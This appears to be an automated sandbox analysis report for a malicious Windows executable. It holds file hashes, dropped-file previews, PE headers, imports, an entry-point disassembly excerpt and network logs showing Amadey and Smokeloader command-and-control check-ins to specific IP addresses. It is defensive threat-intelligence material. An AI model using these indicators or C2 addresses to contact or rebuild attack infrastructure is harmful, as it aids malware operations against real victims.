                                              Preview:.....[D..qU.. :.=.P...$.T.3.K..+...AUh....w....Utk.....i..{.nU.S|.;.X......;.;?aS.!l.v....A..B....E%.cg.K.o....*.|.*@W.*...K...F.R*.&`.=.!.42<S..&..8..|.<....c....^....~.EG...IX..h...T..p...;gQ%K0WW...x..H9..0.I%.m...K..=..k..r.N=.....n.H..Ko.QNP5.$O..H`lZ.W3..K.......#....'D..W2....V."......u.(B.^0.P.6,^'1)u(.T.."....u...F..V...+J.j..,yM.Q..Op.....cx.C..u.Ih7.(..WFI....E.%..d..b......;%S....... .Y.%.3..Ow.2T..q.@.|..!..v..f... .s..E..x.....`..b...tv............*....'..X...Z..q#+.....*.@U.C{.........Mc.Q,...k!dv$E+8...........@..T.........97#.......PU.....3h.5*..*w....<<WQQ*.P.<.2.gO.....F...E.R..9e..G....z]...1....w....]...Mx,!......r!...oY[w.......i|{Y.Bq.O....9.....W.-lS......p. .Y...5d..@..r/Ug.........^.J...:.D...~...._.!..\...|._.~..x(..7$.,I)........i.p)..3..Yl.3C....B?8:...T{..'...I:.'>#.;.:p.&..T....~...l.......Y....Q-V...@?..\.4..~.:h...u[.L....Y.w..q...x.O.....@.F..3....-.sKD.^....9.u.Wo..zW).......,...@..........:..\$.I.>....;.._.
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):244736
                                              Entropy (8bit):6.678359541055903
                                              Encrypted:false
                                              SSDEEP:3072:0Rn60LZzxCCPaCK5T3cyT/KYtNMHO2R2NiruKiwNXJ2v40T2ui7lY6:mRL+CPaas/K02HOBNKnOv9T2lhY6
                                              MD5:C8782DA2928F63712D03D0EA36C57C3F
                                              SHA1:0D87BA5D17440501FE3629F56FEB0A9193D43B43
                                              SHA-256:A68B2D14B767DF5EDB784BC338C84E09D73AC90A75346A9FEDCE2B0163CA9656
                                              SHA-512:BDDF75CFBE80801F52CB4CAEBCA6E36569FABEBF99BB6AA702282B1E9423604D7C86A03CEE7F8FCA16A8DA521174530045E4C3CFACD34DE9306180B1D18291FF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 69%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$./.`.A.`.A.`.A.~...u.A.~.....A.G.:.c.A.`.@...A.~...A.A.~...a.A.~...a.A.Rich`.A.........PE..L...N`.a................."...`.......=.......@....@..........................................................................$..(....... ........................................................... (..@...............D............................text....!.......".................. ..`.data...H....@.......&..............@....rsrc... ............2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:unknown
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Windows\SysWOW64\cacls.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):15
                                              Entropy (8bit):3.240223928941852
                                              Encrypted:false
                                              SSDEEP:3:o3F:o1
                                              MD5:509B054634B6DE74F111C3E646BC80FD
                                              SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                              SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                              SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:processed dir:
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.678359541055903
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:kmxId0uLRn.exe
                                              File size:244736
                                              MD5:c8782da2928f63712d03d0ea36c57c3f
                                              SHA1:0d87ba5d17440501fe3629f56feb0a9193d43b43
                                              SHA256:a68b2d14b767df5edb784bc338c84e09d73ac90a75346a9fedce2b0163ca9656
                                              SHA512:bddf75cfbe80801f52cb4caebca6e36569fabebf99bb6aa702282b1e9423604d7c86a03cee7f8fca16a8da521174530045e4c3cfacd34de9306180b1d18291ff
                                              SSDEEP:3072:0Rn60LZzxCCPaCK5T3cyT/KYtNMHO2R2NiruKiwNXJ2v40T2ui7lY6:mRL+CPaas/K02HOBNKnOv9T2lhY6
                                              TLSH:DC34AD40BA93C462C291AD31CD69C6F1F739FDA599B6064F37187B3F6E303819622636
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$./.`.A.`.A.`.A.~...u.A.~.....A.G.:.c.A.`.@...A.~...A.A.~...a.A.~...a.A.Rich`.A.........PE..L...N`.a................."...`.....
                                              Icon Hash:beccae9eeea62aa2
                                              Entrypoint:0x403df6
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x611E604E [Thu Aug 19 13:44:46 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:e4727ec893dc979e33dd56cc7774fb31
                                              Instruction
                                              call 00007FF59867C275h
                                              jmp 00007FF598677A3Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              mov eax, dword ptr [ebp+08h]
                                              push esi
                                              mov esi, ecx
                                              mov byte ptr [esi+0Ch], 00000000h
                                              test eax, eax
                                              jne 00007FF598677C25h
                                              call 00007FF59867A76Dh
                                              mov dword ptr [esi+08h], eax
                                              mov ecx, dword ptr [eax+6Ch]
                                              mov dword ptr [esi], ecx
                                              mov ecx, dword ptr [eax+68h]
                                              mov dword ptr [esi+04h], ecx
                                              mov ecx, dword ptr [esi]
                                              cmp ecx, dword ptr [00424528h]
                                              je 00007FF598677BD4h
                                              mov ecx, dword ptr [00424444h]
                                              test dword ptr [eax+70h], ecx
                                              jne 00007FF598677BC9h
                                              call 00007FF59867CC94h
                                              mov dword ptr [esi], eax
                                              mov eax, dword ptr [esi+04h]
                                              cmp eax, dword ptr [00424348h]
                                              je 00007FF598677BD8h
                                              mov eax, dword ptr [esi+08h]
                                              mov ecx, dword ptr [00424444h]
                                              test dword ptr [eax+70h], ecx
                                              jne 00007FF598677BCAh
                                              call 00007FF59867C508h
                                              mov dword ptr [esi+04h], eax
                                              mov eax, dword ptr [esi+08h]
                                              test byte ptr [eax+70h], 00000002h
                                              jne 00007FF598677BD6h
                                              or dword ptr [eax+70h], 02h
                                              mov byte ptr [esi+0Ch], 00000001h
                                              jmp 00007FF598677BCCh
                                              mov ecx, dword ptr [eax]
                                              mov dword ptr [esi], ecx
                                              mov eax, dword ptr [eax+04h]
                                              mov dword ptr [esi+04h], eax
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 10h
                                              push esi
                                              push dword ptr [ebp+0Ch]
                                              lea ecx, dword ptr [ebp-10h]
                                              call 00007FF598677B2Ah
                                              mov esi, dword ptr [ebp+08h]
                                              movsx eax, byte ptr [esi]
                                              push eax
                                              call 00007FF59867CE37h
                                              cmp eax, 65h
                                              jmp 00007FF598677BCEh
                                              inc esi
                                              movzx eax, byte ptr [esi]
                                              push eax
                                              call 00007FF59867CCE5h
                                              test eax, eax
                                              pop ecx
                                              jne 00007FF598677BB3h
                                              movsx eax, byte ptr [esi]
                                              Programming Language:
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [C++] VS2008 build 21022
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1248c0x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x18920.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x12900x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28200x40.text
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x244.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x121c20x12200False0.526239224137931data6.287587198243143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x140000x2bf480x10c00False0.9437383395522388data7.832296161196346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x400000x189200x18a00False0.5258565989847716data5.47809790236992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              RT_CURSOR0x566680x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
                                              RT_CURSOR0x567980xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
                                              RT_CURSOR0x568880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                              RT_CURSOR0x579600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                              RT_ICON0x409300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x40ff80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x415600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x426080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x42ab00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x433580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x43a200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x43f880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x450300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x459b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x45e800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x467280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x48cd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x49da80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4ac500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4b4f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4bbc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4c1280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Raeto-RomanceSwitzerland
                                              RT_ICON0x4e6d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Raeto-RomanceSwitzerland
                                              RT_ICON0x4f7780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Raeto-RomanceSwitzerland
                                              RT_ICON0x501000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Raeto-RomanceSwitzerland
                                              RT_ICON0x505e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x514880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x51b500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x520b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x546600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x557080x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x560900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_STRING0x583700x1dadataRaeto-RomanceSwitzerland
                                              RT_STRING0x585500x150dataRaeto-RomanceSwitzerland
                                              RT_STRING0x586a00x27cdataRaeto-RomanceSwitzerland
                                              RT_ACCELERATOR0x565d80x90dataRaeto-RomanceSwitzerland
                                              RT_ACCELERATOR0x565600x78dataRaeto-RomanceSwitzerland
                                              RT_GROUP_CURSOR0x579300x30data
                                              RT_GROUP_CURSOR0x582080x14data
                                              RT_GROUP_ICON0x49d780x30dataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x45e200x5adataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x505680x76dataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x42a700x3edataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x564f80x68dataRaeto-RomanceSwitzerland
                                              RT_VERSION0x582200x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                              DLLImport
                                              KERNEL32.dllLoadLibraryW, CallNamedPipeW, EnumSystemCodePagesW, EnumDateFormatsA, OpenMutexA, GetConsoleAliasesLengthA, CompareStringA, AreFileApisANSI, CreateFileW, EnumCalendarInfoExA, RequestWakeupLatency, GetConsoleAliasA, CreateFileA, SetComputerNameA, GetSystemWindowsDirectoryA, GetModuleHandleA, GlobalUnlock, FindFirstVolumeMountPointW, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, SearchPathW, MoveFileW, CallNamedPipeA, GetCurrentDirectoryW, GetDriveTypeW, CreateMailslotA, CommConfigDialogW, GetProcAddress, LocalAlloc, DeleteTimerQueueTimer, SetHandleInformation, CreateJobObjectW, WriteConsoleOutputAttribute, FindFirstVolumeA, InterlockedIncrement, LocalFlags, CloseHandle, GetTickCount, ZombifyActCtx, SetConsoleCtrlHandler, AddAtomA, GetThreadPriority, FreeEnvironmentStringsW, InterlockedExchange, GetConsoleTitleW, SetVolumeMountPointA, ClearCommError, lstrlenA, CreateDirectoryExA, LoadLibraryA, GlobalFindAtomA, TerminateJobObject, lstrcpynA, BackupSeek, GetSystemDirectoryA, VerSetConditionMask, EnumSystemLocalesW, InterlockedFlushSList, WritePrivateProfileSectionW, GetStringTypeExW, GetFileAttributesW, ActivateActCtx, ReadFile, ResetEvent, LocalShrink, LocalLock, GlobalCompact, SetCommState, WriteConsoleInputW, DeleteAtom, FindResourceW, GetConsoleSelectionInfo, CreateIoCompletionPort, GetPrivateProfileStructA, ConvertThreadToFiber, InterlockedExchangeAdd, EnumCalendarInfoW, GetConsoleMode, EnumCalendarInfoA, GetConsoleAliasExesLengthA, CopyFileA, InterlockedDecrement, HeapAlloc, GetLastError, DeleteFileA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapSize, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RaiseException, InitializeCriticalSectionAndSpinCount, RtlUnwind, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, FlushFileBuffers, SetFilePointer, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
                                              Language of compilation systemCountry where language is spokenMap
                                              Raeto-RomanceSwitzerland
                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              192.168.2.362.204.41.7949801802027700 12/13/22-20:09:37.904526TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949764802027700 12/13/22-20:09:24.415498TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949749802027700 12/13/22-20:09:18.397632TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949767802027700 12/13/22-20:09:25.222687TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949795802027700 12/13/22-20:09:35.735518TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949770802027700 12/13/22-20:09:26.190276TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.362.204.41.79
                                              192.168.2.3185.246.221.15149699802851815 12/13/22-20:08:50.072694TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184969980192.168.2.3185.246.221.151
                                              192.168.2.362.204.41.7949740802027700 12/13/22-20:09:15.487438TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949798802027700 12/13/22-20:09:36.748511TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949746802027700 12/13/22-20:09:17.426965TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949743802027700 12/13/22-20:09:16.449856TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949761802027700 12/13/22-20:09:23.806620TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949752802027700 12/13/22-20:09:21.874851TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949771802027700 12/13/22-20:09:26.565033TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949802802027700 12/13/22-20:09:39.191576TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949748802027700 12/13/22-20:09:18.100262TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949777802027700 12/13/22-20:09:30.589327TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949742802027700 12/13/22-20:09:16.147180TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949794802027700 12/13/22-20:09:35.428306TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949789802027700 12/13/22-20:09:34.068418TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949754802027700 12/13/22-20:09:22.487126TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949782802027700 12/13/22-20:09:32.020133TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949747802027700 12/13/22-20:09:17.691856TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949760802027700 12/13/22-20:09:23.551005TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949776802027700 12/13/22-20:09:30.348436TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949753802027700 12/13/22-20:09:22.159892TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949759802027700 12/13/22-20:09:23.268020TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949783802027700 12/13/22-20:09:32.395745TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949807802027700 12/13/22-20:09:40.738951TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949788802027700 12/13/22-20:09:33.792525TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949765802027700 12/13/22-20:09:24.668106TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949787802027700 12/13/22-20:09:33.525784TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949790802027700 12/13/22-20:09:34.337562TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949796802027700 12/13/22-20:09:36.034730TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949781802027700 12/13/22-20:09:31.753391TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949772802027700 12/13/22-20:09:29.469495TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949735802027700 12/13/22-20:09:14.280167TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949741802027700 12/13/22-20:09:15.797540TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949799802027700 12/13/22-20:09:37.255404TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949766802027700 12/13/22-20:09:24.922545TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949803802027700 12/13/22-20:09:39.585529TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949806802027700 12/13/22-20:09:40.381114TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949757802027700 12/13/22-20:09:23.006710TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949778802027700 12/13/22-20:09:30.907345TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949775802027700 12/13/22-20:09:30.081643TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949793802027700 12/13/22-20:09:35.174611TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949800802027700 12/13/22-20:09:37.581033TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949784802027700 12/13/22-20:09:32.706051TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949769802027700 12/13/22-20:09:25.868942TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949774802027700 12/13/22-20:09:29.736811TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949805802027700 12/13/22-20:09:40.125674TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949768802027700 12/13/22-20:09:25.563234TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949751802027700 12/13/22-20:09:20.733567TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949786802027700 12/13/22-20:09:33.253065TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949791802027700 12/13/22-20:09:34.581849TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949739802027700 12/13/22-20:09:15.157831TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949745802027700 12/13/22-20:09:17.106517TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949750802027700 12/13/22-20:09:19.302564TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949792802027700 12/13/22-20:09:34.882839TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949779802027700 12/13/22-20:09:31.163445TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949785802027700 12/13/22-20:09:32.996655TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949744802027700 12/13/22-20:09:16.793275TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949780802027700 12/13/22-20:09:31.434688TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949738802027700 12/13/22-20:09:14.724261TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949762802027700 12/13/22-20:09:24.088211TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949804802027700 12/13/22-20:09:39.864342TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949756802027700 12/13/22-20:09:22.763314TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949797802027700 12/13/22-20:09:36.311423TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.362.204.41.79
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2022 20:07:42.480623960 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.480819941 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.480911970 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.480976105 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481025934 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481070042 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481070042 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481122017 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481122017 CET49696443192.168.2.3204.79.197.200
